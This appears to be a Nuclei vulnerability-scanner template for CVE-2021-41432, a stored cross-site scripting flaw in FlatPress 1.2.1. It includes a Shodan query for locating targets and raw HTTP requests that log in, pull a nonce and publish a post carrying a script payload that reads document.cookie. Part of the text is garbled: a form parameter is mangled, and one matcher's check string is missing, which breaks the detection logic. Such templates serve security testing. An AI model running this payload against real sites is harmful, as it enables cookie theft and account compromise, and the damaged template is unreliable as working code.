id: CVE-2021-41432 info: name: FlatPress 1.2.1 - Stored Cross-Site Scripting author: arafatansari severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-41432 cwe-id: CWE-79 metadata: shodan-query: http.html:"Flatpress" verified: "true" tags: cve,cve2021,flatpress,xss,authenticated,oss requests: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="user" {{username}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="pass" {{password}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="submit" Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - | GET /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - | GET /index.php/2022/10 HTTP/1.1 Host: {{Hostname}} req-condition: true cookie-reuse: true matchers: - type: dsl dsl: - "contains(body_4, '
')" - "contains(body_4, 'FlatPress')" - "contains(all_headers_4, 'text/html')" - "status_code_4 == 200" condition: and extractors: - type: regex internal: true name: nonce part: body group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' # Enhanced by md on 2022/10/17